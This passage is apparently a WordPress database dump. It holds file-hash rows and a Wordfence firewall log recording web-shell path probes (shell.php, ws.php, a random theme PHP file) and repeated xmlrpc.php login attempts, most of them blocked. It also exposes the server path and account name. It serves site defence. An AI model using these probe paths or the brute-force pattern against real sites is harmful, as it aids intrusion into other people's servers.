('SÛÊ&ëaz8öJØ¶9§', 'wp-includes/widgets.php', '/home/equipm11/public_html/happythinking.com/wp-includes/widgets.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'r³|U•£;=f‘ëQ', 'Á†BGYmIÍ\nqTÆv¹þ®Q‡«\Zÿ÷dPÆ°', '', 0, '?'),
('LÂŠe¡t"pc(	’eÇ', 'wp-includes/wp-db.php', '/home/equipm11/public_html/happythinking.com/wp-includes/wp-db.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'qÊa•fä€q@.R¼Ño', 'ˆt\\K¼(É®ËXÎ''Œ´·[çª&èÉxlâò§ ', '', 0, '?'),
('(ï^¦3N½š©“‘¢3', 'wp-includes/wp-diff.php', '/home/equipm11/public_html/happythinking.com/wp-includes/wp-diff.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ' ‘É-xñ•<Äz^¤Wet', 'üaÿÛ;˜Éº³ä*2Z¹œf1›ò"§\n°Nt~Ÿ>‚…', '', 0, '?'),
('šÿ™^''½qˆÂî0…ê', 'wp-links-opml.php', '/home/equipm11/public_html/happythinking.com/wp-links-opml.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Åý¢\rW5t,}Á"×«', 'ÂRysxüL9Æâþï5"™CZÞÌœýô95ºâ ;§', '', 0, '?'),
('$»Àªj¶Xž])D:', 'wp-load.php', '/home/equipm11/public_html/happythinking.com/wp-load.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'a\\`UëzC!pô}¥}µ}O', 'jCÿv¢¨:\ZÆÔisòüÜ…m®í9Ç\rÊô“PvFÎà—', '', 0, '?'),
('Ýº\r\0FJÈä–BáÞeç', 'wp-login.php', '/home/equipm11/public_html/happythinking.com/wp-login.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ')8Í¹''.ýCŽôš¸¿ý”ò', 'ld¯w¯T›na7)Õ²b¶”_o]Ä2\Zë§2ª#¤HÁ˜', '', 0, '?'),
('´ƒ3 T.^Æ™<Þ÷ø', 'wp-mail.php', '/home/equipm11/public_html/happythinking.com/wp-mail.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '[Ð…@*Jew¼qz"cT', 'V^[ñé<üVûëMXï‘¾9‹[Q 0Â	³8‚l‹', '', 0, '?'),
(';1Ñ‹#ÁY_N„¥t÷', 'wp-settings.php', '/home/equipm11/public_html/happythinking.com/wp-settings.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '´Þ—AæP^GÙ¢—*û', 'êwÆŽh=S¢r²›Leóðøun;%‘>D3e$:\\Ý', '', 0, '?'),
('Œ,4#¢…(ç#', 'wp-signup.php', '/home/equipm11/public_html/happythinking.com/wp-signup.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'é_Š·>¦\ZÛ?¦‚¤ü~¾', 'Ûý!<èãf}ã–SNr}&âþQi¤\\‚=¢\nUõò^', '', 0, '?'),
('oã®š-×;?X:ûpÒ¡', 'wp-trackback.php', '/home/equipm11/public_html/happythinking.com/wp-trackback.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÛsÐSì2S`qy+è<l', '.H.¹à”É$Ž¨—}íY_Èì Žì\0‹ÐÎÔ0þ!', '', 0, '?'),
('4Ú‚œÙL$¼,K[œuÌâ„', 'xmlrpc.php', '/home/equipm11/public_html/happythinking.com/xmlrpc.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'XD1Žã\\¡Œ—øÆ5›~', 'ÚjD^´ÿöb5c2/Ør	›ó=Ð8Q7\0á˜D', '', 0, '?');

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wfhits`
--

CREATE TABLE `wpou_wfhits` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `attackLogTime` double(17,6) unsigned NOT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `jsRun` tinyint(4) DEFAULT 0,
  `statusCode` int(11) NOT NULL DEFAULT 200,
  `isGoogle` tinyint(4) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `newVisit` tinyint(3) unsigned NOT NULL,
  `URL` text DEFAULT NULL,
  `referer` text DEFAULT NULL,
  `UA` text DEFAULT NULL,
  `action` varchar(64) NOT NULL DEFAULT '',
  `actionDescription` text DEFAULT NULL,
  `actionData` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`IP`,`ctime`),
  KEY `attackLogTime` (`attackLogTime`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wpou_wfhits`
--

INSERT INTO `wpou_wfhits` VALUES
(50957, 1712207715.361326, 1712207714.954000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(51052, 1712316541.692977, 1712316541.250300, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/themes/classic/inc/RxRvxtgj.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2NsYXNzaWMvaW5jL1J4UnZ4dGdqLnBocA==","category":"brute-force","ssl":1}'),
(50994, 1712208090.331553, 1712208089.936200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/shell.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NoZWxsLnBocA==","category":"brute-force","ssl":1}'),
(51183, 0.000000, 1712319529.354989, '\0\0\0\0\0\0\0\0\0\0ÿÿ;[ƒW', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(50993, 1712208108.232056, 1712208107.026200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/ws.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzLnBocA==","category":"brute-force","ssl":1}'),
(51182, 0.000000, 1712319528.670974, '\0\0\0\0\0\0\0\0\0\0ÿÿfÞt', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51053, 1712316539.288448, 1712316538.894500, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/themes/classic/inc/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2NsYXNzaWMvaW5jL2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(50992, 1712208128.242481, 1712208126.779300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/dropdown.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Ryb3Bkb3duLnBocA==","category":"brute-force","ssl":1}'),
(51063, 0.000000, 1712318733.484142, '\0\0\0\0\0\0\0\0\0\0ÿÿ^@ùÛ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51064, 0.000000, 1712318756.016380, '\0\0\0\0\0\0\0\0\0\0ÿÿÂâæ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51065, 0.000000, 1712318772.283516, '\0\0\0\0\0\0\0\0\0\0ÿÿpÎÐ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51066, 0.000000, 1712318785.039483, '\0\0\0\0\0\0\0\0\0\0ÿÿ16Ï', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51067, 0.000000, 1712318821.180486, '\0\0\0\0\0\0\0\0\0\0ÿÿj3\\‚', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51068, 0.000000, 1712318854.359345, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾2èÍ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51069, 0.000000, 1712318880.441564, '\0\0\0\0\0\0\0\0\0\0ÿÿËÀñ[', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51070, 0.000000, 1712318892.820991, '\0\0\0\0\0\0\0\0\0\0ÿÿµ.L', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51071, 0.000000, 1712318893.061284, '\0\0\0\0\0\0\0\0\0\0ÿÿUu8H', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51072, 0.000000, 1712318894.746833, '\0\0\0\0\0\0\0\0\0\0ÿÿuÏ¶7', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51073, 0.000000, 1712318906.587282, '\0\0\0\0\0\0\0\0\0\0ÿÿp…ö¥', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51074, 0.000000, 1712318936.559982, '\0\0\0\0\0\0\0\0\0\0ÿÿ²ß—Q', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51075, 0.000000, 1712318946.053692, '\0\0\0\0\0\0\0\0\0\0ÿÿQÄÌÚ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51076, 0.000000, 1712318947.298182, '\0\0\0\0\0\0\0\0\0\0ÿÿg›Þ8', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51077, 0.000000, 1712318956.747699, '\0\0\0\0\0\0\0\0\0\0ÿÿ½Gï¦', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51078, 0.000000, 1712318963.913800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[»”Œ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51079, 0.000000, 1712318992.786333, '\0\0\0\0\0\0\0\0\0\0ÿÿg¯‰Ù', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51080, 0.000000, 1712318996.148070, '\0\0\0\0\0\0\0\0\0\0ÿÿ_¬­­', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51081, 0.000000, 1712319001.472763, '\0\0\0\0\0\0\0\0\0\0ÿÿo}ç›', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51082, 0.000000, 1712319003.182916, '\0\0\0\0\0\0\0\0\0\0ÿÿgµd›', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51083, 0.000000, 1712319003.651970, '\0\0\0\0\0\0\0\0\0\0ÿÿÅýr', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51084, 0.000000, 1712319014.061661, '\0\0\0\0\0\0\0\0\0\0ÿÿ±ëq¬', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51085, 0.000000, 1712319020.828493, '\0\0\0\0\0\0\0\0\0\0ÿÿ²ýÔV', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51086, 0.000000, 1712319021.929843, '\0\0\0\0\0\0\0\0\0\0ÿÿgœå', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51087, 0.000000, 1712319022.122764, '\0\0\0\0\0\0\0\0\0\0ÿÿ])À|', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51088, 0.000000, 1712319026.104559, '\0\0\0\0\0\0\0\0\0\0ÿÿw˜™N', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51089, 0.000000, 1712319031.640685, '\0\0\0\0\0\0\0\0\0\0ÿÿ·Rti', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51090, 1712319044.236883, 1712319043.926300, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾2èÍ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3htbHJwYy5waHA="}'),
(51091, 1712319042.697457, 1712319042.369200, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾2èÍ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(51092, 0.000000, 1712319072.418215, '\0\0\0\0\0\0\0\0\0\0ÿÿ)J‡Ô', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51093, 0.000000, 1712319074.223935, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹‡-B', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51094, 0.000000, 1712319077.024359, '\0\0\0\0\0\0\0\0\0\0ÿÿj3—ñ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51095, 0.000000, 1712319078.136810, '\0\0\0\0\0\0\0\0\0\0ÿÿnâ´|', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51096, 0.000000, 1712319079.029323, '\0\0\0\0\0\0\0\0\0\0ÿÿHÿ\Z±', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51097, 0.000000, 1712319080.123227, '\0\0\0\0\0\0\0\0\0\0ÿÿu÷`I', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51098, 0.000000, 1712319081.358205, '\0\0\0\0\0\0\0\0\0\0ÿÿ1Íˆ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51099, 0.000000, 1712319087.842917, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾\r†‚', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51100, 0.000000, 1712319093.847498, '\0\0\0\0\0\0\0\0\0\0ÿÿPAG|', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51101, 0.000000, 1712319098.044475, '\0\0\0\0\0\0\0\0\0\0ÿÿºzh#', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51102, 0.000000, 1712319098.568092, '\0\0\0\0\0\0\0\0\0\0ÿÿ7ôh', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51103, 0.000000, 1712319116.738472, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶EµZ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51104, 0.000000, 1712319133.347733, '\0\0\0\0\0\0\0\0\0\0ÿÿ³h«', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51105, 1712319141.871041, 1712319141.573700, '\0\0\0\0\0\0\0\0\0\0ÿÿw˜™N', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3htbHJwYy5waHA="}'),
(51106, 1712319139.465101, 1712319139.108800, '\0\0\0\0\0\0\0\0\0\0ÿÿw˜™N', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(51107, 0.000000, 1712319145.393906, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯°ñ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51108, 0.000000, 1712319151.342835, '\0\0\0\0\0\0\0\0\0\0ÿÿcóÆ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51109, 0.000000, 1712319153.367211, '\0\0\0\0\0\0\0\0\0\0ÿÿWý:µ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51110, 0.000000, 1712319153.474502, '\0\0\0\0\0\0\0\0\0\0ÿÿw(PÕ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51111, 0.000000, 1712319168.535537, '\0\0\0\0\0\0\0\0\0\0ÿÿg­\\', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51112, 0.000000, 1712319182.265021, '\0\0\0\0\0\0\0\0\0\0ÿÿ¨\0ê', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51113, 0.000000, 1712319194.623871, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼¤Ú ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51114, 0.000000, 1712319196.875537, '\0\0\0\0\0\0\0\0\0\0ÿÿuÞ~¯', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
